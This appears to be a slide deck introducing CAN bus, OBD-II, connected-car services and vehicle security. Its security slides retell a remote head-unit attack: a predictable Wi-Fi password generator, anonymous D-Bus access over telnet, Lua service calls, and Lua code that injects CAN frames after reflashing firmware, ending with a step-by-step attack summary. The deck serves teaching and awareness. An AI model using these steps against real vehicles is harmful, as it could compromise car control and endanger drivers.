Connected Car
An introduction to :
- can-bus
- OBD-II
- connected car security
- connected car use-cases
Who am I ?
Definition
- Car with internet based communications between
- car and its surroundings
- car and third parties
- car and driver
-
Using either
- a dedicated internet connection
- smartphone link
eCall
- Government program to reduce fatalities on the road
- Cuts emergency services response time
- Time saved = Lifes saved
- Executed automatically on airbag deployment / pushing a button in a car
eCall
eCall Timeline
2001
Presented
2007
Delayed
2011
Pushed back
2013
Adopted
2 year term
2015
Target
not met
2016
New target
2018
Architectures
- Embedded
- Everything inside the car
- SIM card / modem / connectivity
- Runs standalone
- Vehicle centric
- Monthly fee to OEM
- Tethered
- External SIM card (glove compartment / phone)
- Cost associated with SIM card.
Architectures
-
Integrated
- Via smartphone
- Driver distraction
- Cost associated with SIM card.
- After Market
- Onboard Diagnostics port (OBD-II solutions)
- Via smartphone bluetooth connection
- Via dedicated 2G/3G/4G solution
- Internal CAN Solutions
- Onboard Diagnostics port (OBD-II solutions)
Manufacturers
OEM Characteristics
- Closed systems
- Very limited set of API
- Difficult to integrate with
- How to integrate ?
- Remote APIs
- OEM Development platforms
Services offered
- Remote Diagnostics
- Stolen Vehicle
- Where did I park
- Speed monitoring
- Geo Fencing
- Telematics (insurance)
- Driver behavior monitoring
- Fuel prices
- Predicitive maintanance
- Remote Services
- lock/unlock
- control AC
- monitor fuel level
- WiFi HotSpot
Vehicle Anatomy
Vehicle Anatomy
- Different components ECU
- Different busses
- Lots of wires
CAN-BUS
CAN-BUS
- What
- Types of can
- CAN Nodes
- Other busses
- Demo
What is it ?
- Controller Area Network
- Way to link electronic systems (in a car)
- Allows these systems to communicate
- Developped by Bosch GmbH
- Simplifies the wiring requirements
First Can Bus car
Without Can Bus
With Can Bus
Reality
Link systems (nodes)
CAN Nodes
- Microcontroller. The brains
- CAN controller (often an integral part of the microcontroller)
- Transceiver Defined by ISO 11898-2/3
CAN Nodes
ECU
Diagnostic device
Prototyping
device
SocketCAN
SocketCAN (Linux)
ifconfig
can0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
UP RUNNING NOARP MTU:16 Metric:1
RX packets:465418 errors:0 dropped:0 overruns:0 frame:0
TX packets:402 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:10
RX bytes:3723344 (3.5 MiB) TX bytes:3216 (3.1 KiB)
eth0 Link encap:Ethernet HWaddr b8:27:eb:76:80:92
inet addr:192.168.1.114 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::66e3:3bb8:8ba:6a98/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:16991 errors:0 dropped:1 overruns:0 frame:0
TX packets:16397 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1879039 (1.7 MiB) TX bytes:3226514 (3.0 MiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:72 errors:0 dropped:0 overruns:0 frame:0
TX packets:72 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:6288 (6.1 KiB) TX bytes:6288 (6.1 KiB)
candump
candump -ta can0
(1463423655.613548) can0 110 [8] 68 00 00 00 00 00 00 00
(1463423655.613769) can0 120 [8] 40 32 02 77 2A 27 60 00
(1463423655.623525) can0 110 [8] 68 00 00 00 00 00 00 00
(1463423655.623735) can0 120 [8] 40 32 02 77 2A 27 60 00
(1463423655.633500) can0 110 [8] 68 00 00 00 00 00 00 00
(1463423655.633720) can0 120 [8] 40 32 02 77 2A 27 60 00
(1463423655.643550) can0 110 [8] 68 00 00 00 00 00 00 00
(1463423655.643768) can0 120 [8] 40 32 02 77 2A 27 60 00
(1463423655.644017) can0 1A0 [8] 00 15 E0 7C 00 00 00 00
(1463423655.653501) can0 110 [8] 68 00 00 00 00 00 00 00
(1463423655.653682) can0 120 [8] 40 32 02 77 2A 27 60 00
(1463423655.663504) can0 110 [8] 68 00 00 00 00 00 00 00
(1463423655.663729) can0 120 [8] 40 32 02 77 2A 27 60 00
(1463423655.673466) can0 110 [8] 68 00 00 00 00 00 00 00
(1463423655.673689) can0 120 [8] 40 32 02 77 2A 27 60 00
(1463423655.683537) can0 110 [8] 68 00 00 00 00 00 00 00
(1463423655.683755) can0 120 [8] 40 32 02 77 2A 27 60 00
(1463423655.693447) can0 110 [8] 68 00 00 00 00 00 00 00
(1463423655.693666) can0 120 [8] 40 32 02 77 2A 27 60 00
(1463423655.693911) can0 1A0 [8] 00 15 E0 7C 00 00 00 00
(1463423655.694164) can0 301 [8] 01 00 3A 00 00 24 C0 00
(1463423655.694407) can0 410 [8] 80 01 3E 00 00 00 00 00
(1463423655.703490) can0 480 [8] 10 11 02 A0 00 00 00 00
(1463423655.703725) can0 110 [8] 68 00 00 00 00 00 00 00
(1463423655.703949) can0 120 [8] 40 32 02 77 2A 27 60 00
(1463423655.704196) can0 300 [8] D8 C3 00 00 40 00 00 00
(1463423655.713458) can0 110 [8] 68 00 00 00 00 00 00 00cansniffer
cansniffer can0
- time ID data ... < cansniffer can0 # l=2 h=10 t=50 >
^C000000 110 68 00 00 00 00 00 00 00 h.......
0.000000 120 40 32 02 77 2A 27 60 00 @2.w*'`.
0.000000 1a0 00 15 E0 7C 00 00 00 00 ...|....
0.000000 300 D8 C3 00 00 40 00 00 00 ....@...
0.000000 301 01 00 3A 00 00 24 C0 00 ..:..$..
0.000000 410 80 01 3E 00 00 00 00 00 ..>.....
0.000000 480 10 11 02 A0 00 00 00 00 ........
0.000000 510 63 1E 78 07 00 00 00 00 c.x.....
- Sniff the canbus instead of dumping it
- Watch out for repeating messages / new messages
cansend
(1463423913.010586) can0 110 [8] 68 00 00 00 00 00 00 00
(1463423913.010815) can0 120 [8] 40 32 02 77 2A 27 60 00
(1463423913.020676) can0 110 [8] 68 00 00 00 00 00 00 00
(1463423913.020829) can0 120 [8] 40 32 02 77 2A 27 60 00
(1463423913.027104) can0 7DF [8] 02 01 05 00 00 00 00 00
(1463423913.030696) can0 110 [8] 68 00 00 00 00 00 00 00
(1463423913.030893) can0 120 [8] 40 32 02 77 2A 27 60 00
(1463423913.040475) can0 7E8 [8] 03 41 05 00 00 00 00 00
(1463423913.040716) can0 110 [8] 68 00 00 00 00 00 00 00
(1463423913.040935) can0 120 [8] 40 32 02 77 2A 27 60 00
(1463423913.050566) can0 110 [8] 68 00 00 00 00 00 00 00
(1463423913.050780) can0 120 [8] 40 32 02 77 2A 27 60 00
- Send a command to the canbus
# Get coolant temperature
cansend can0 7DF#0201050000000000- Be sure to spot it in the dump
- Or snif it
- time ID data ... < cansniffer can0 # l=2 h=10 t=50 >
0.000000 7df 02 01 05 00 00 00 00 00 ........
0.000000 7e8 03 41 05 00 00 00 00 00 .A......
Can-bus hacking
Different types of CAN
- ISO 11898-2 : High Speed CAN
- Typically includes modules responsible for engine, breaks, transmission,...
- ISO 11898-3 : Low Speed CAN
- Can include modules for climate control, audio, window & sunroof control,...
Not limited to cars
- Industry Machine control
- Medical Equipment
- Factory automation
- and even .....
Other busses
| GMLan | LIN | CAN | FlexRay |
|---|---|---|---|
| 33kbit/s | 40kbit/s | 1Mbit/s | 10Mbit/s |
| 1 wire | 1 wire | 2 wires | 2/4 wires |
| Single wire CAN. Low speed GM / VW non critical components |
Body Electronics (non critical components) | Powertrain (engine, transmission) |
High performance Powertrain (drive by wire / cruise-control / active suspension |
Accessing CAN
OBD-II
Onboard Diagnostics
- OBD refers to communication with the Engine Control Unit (ECU)
- Initial goal : help fight emissions and engine failures.
- Today : major source of info for aftermarket connected car platforms
OBD Specifications
- The diagnostic connector
- location
- pinout
- available protocols
- The Messaging format
- Supported vehicle parameters (PIDs)
- Encoding of those params
- Extensible list of DTCs (Diagnostic Trouble Codes)
Diagnostic connector
- Data Link Connector (DLC)
- SAE-J1962
- 16 pin connector
- female male
Port location
- Prior to OBD-II :
- A bit of a mystery
Port location
- Since OBD-II : somewhat standardized.
- 16 inches from the steering wheel.
- Still sometimes difficult to find.
Port pinout
- 16 pins
- Different protocols
- standard
- vendor specific
- CAN being an important
protocol.
OBD Protocols
- 5 possible protocols can be offered on the OBD-II port
- Normal vehicles
- SAE J1850 PWM
- SAE J1850 VPW
- ISO 9141-2
- ISO 14230 KWP2000
- ISO 15765 CAN
- Heavy Duty Vehicles
- J1939
OBD PIDs
- PID = Parameter ID
- Identifies a single data point
- Standard list of OBD-II (eOBD) PIDs
- Speed
- RPM
- Coolant Temperature
- SupportedPIDs feature
- Indicate if a manufacturer supports a certain PID
- Manufacturer specific PIDs
OBD PIDs
OBD DTC
- Extensible list of DTCs (Diagnostic Trouble Codes)
ELM327 chipset
STN1110
STN1110
ARM Architecture
OBD Security issues
- No authentication / authorization.
- Everybody who can access OBD / CAN can access everything !
Demo time
Connected Car Security
- Attach vectors
- Worst nightmare : Compromise a vehicle without physical access by sending CAN packages to its CANBUS.
- Image above comes from a 2013 blog post of somebody accessing CAN directly.
- In 2014, a team of IT security researchers pulled it off remotely !
Connected Car Security
- In 2014, a team of IT security researchers pulled it off remotely !
Attack Vectors
- OBD-II Port / car wiring (Duh....)
- physical access required
- send CAN messages onto the CAN-BUS using OBD
- Cellular network
- Embedded cellular networks can also be "hacked".
- Use the network to "ping" the car.
- Infotainment system
- WIFI / Bluetooth stack
- Android apps
- USB / Audio files (CDs)
- Perform firmware updates (specially encoded CDs)
- Can often communicate with CAN-BUS
Attack Vectors
- Large VS small attack surface
- Large: bluetooth stack
- Small: key transponder (small range / window)
- Complexity of the cars architecture
- Physical components
- Software stacks
- OTA features
- Physical features
- USB dongles
- CD players
Architecture
Entry point
- Central head unit
- Access point to the Wi-Fi / Cellular / Bluetooth system
- Runs QNX RTOS on an ARM microcontroller
Wi-Fi
- WiFi uses WPA2
- Pretty secure in principle.....
- But what if we can retrieve the generated password algorithm
char *get_password(){
int c_max = 12;
int c_min = 8;
unsigned int t = time(NULL);
srand (t);
unsigned int len = (rand() % (c_max - c_min + 1)) + c_min;
char *password = malloc(len);
int v9 = 0;
do{
unsigned int v10 = rand();
int v11 = convert_byte_to_ascii_letter(v10 % 62);
password[v9] = v11;
v9++;
} while (len > v9);
return password;
}
OBD Specifications
- Once connected to WiFi , do a portscan :
Portscan : Get inside the D-Bus (anonymous access)
telnet 192.168.5.1 6667
Trying 192.168.5.1...
Connected to 192.168.5.1.
Escape character is '^]'.
AUTH ANONYMOUS
OK 4943a53752f52f82a9ea4e6e00000001
BEGIN
And start hacking....
- Setting radio volume
require "service"
params = {}
params.volume = tonumber(arg[1])
x=service.invoke("com.harman.service.AudioSettings", "setVolume", params)
What about CAN access ?
Head Unit
Texas Instruments
OMAP DM3730
Renesas V850
X
Vulnerabilities
- With physical access it is possible to get code running on the head unit
- if you have physical access with a USB stick (jailbreak)
- If you can access to the in-car Wi-Fi (exploiting the D-Bus vulnerability/functionality)
- Both require either physical access or the ability for the attacker to join the Wi-Fi hotspot (if one even exists), respectively.
Sprint
- FemToCell device
- Get on the sprint network and access any sprint device.
Inject CAN messages
- Modify the firmware and upload it (remotely)
- Find a function in the the V850 chip that can do CAN communication.
- Inject some code in there to launch CAN messages :
ipc = require("ipc")
file = '/dev/ipc/ch7'
g = assert(ipc.open(file))
f0,02,39|91,LEN,CAN1,CAN2,CAN3,CAN4,DATA0,DATA1...
g:write(0xf0, 0x02, 91, 0x08, 0xf1, 0x86, 0xda, 0xf8,
0x05, 0x2F, 0x51, 0x06, 0x03, 0x10, 0x00, 0x00)
Summary
- Get the IP of the vehicle
- Exploit OMAP chip on the head unit (using the D-BUS exploit - open port / anonymous access)
- Use provided DBus services to start hacking (switching radio / .... ).
- Still no CAN access at this point.
- Flash the v850 with modified firmware
- Can be done from the head unit using OTA
- Will prompt a reboot - might warn the user something is wrong.
- Inject CAN messages
- Mission accomplished.
Use-cases
Use-cases
Vehicle Identification
- Automatically identifies vehicles using vin (chassis) number
- easy integration with 3rd party systems
Vehicle Maintanance
- Configuration of mileage intervals
- Time based or mileage based
- Keeps track of previous maintenance
- Specify intervals / thresholds
- Allows for the system to notify when vehicle is (over)due for maintenance
Vehicle Diagnostics
- Manufacturer specific engine fault codes (beyond the eOBD specification)
- Manufacturer specific fuel level readings (beyond the eOBD specification)
Vehicle Mileage
- High accuracy tachograph built-in via OBD-II
- Automatic read-out of mileage from the ECU and / or BCM on select models
- Better accuracy than GPS
Vehicle Introspection
- Get in-depth knowledge of the cars capabilities.
- Analyses the supported PIDs automatically
Vehicle Metrics
- Supported OBD-II PIDs
- Average / max speed , rpm
- Trip information (mileage, time)
- Battery voltage
- Eco-driving info (nr of stops, idling time, speeding, brakes, acceleration,….)
- Engine Temp
- Fuel level
- ....
Eco driving
- OBD-II based datasets for eco-driving :
- speed
- rpm
- throttle position
- fuel level
- accelerometer
Track and trace
- Know where you fleet is located
Track and trace
- Stream live OBD-II data from a running vehicle
Thank you
Connected Car
By Davy De Waele
Connected Car
An introduction to CAN Bus / OBD-II / connected car security and much much more.
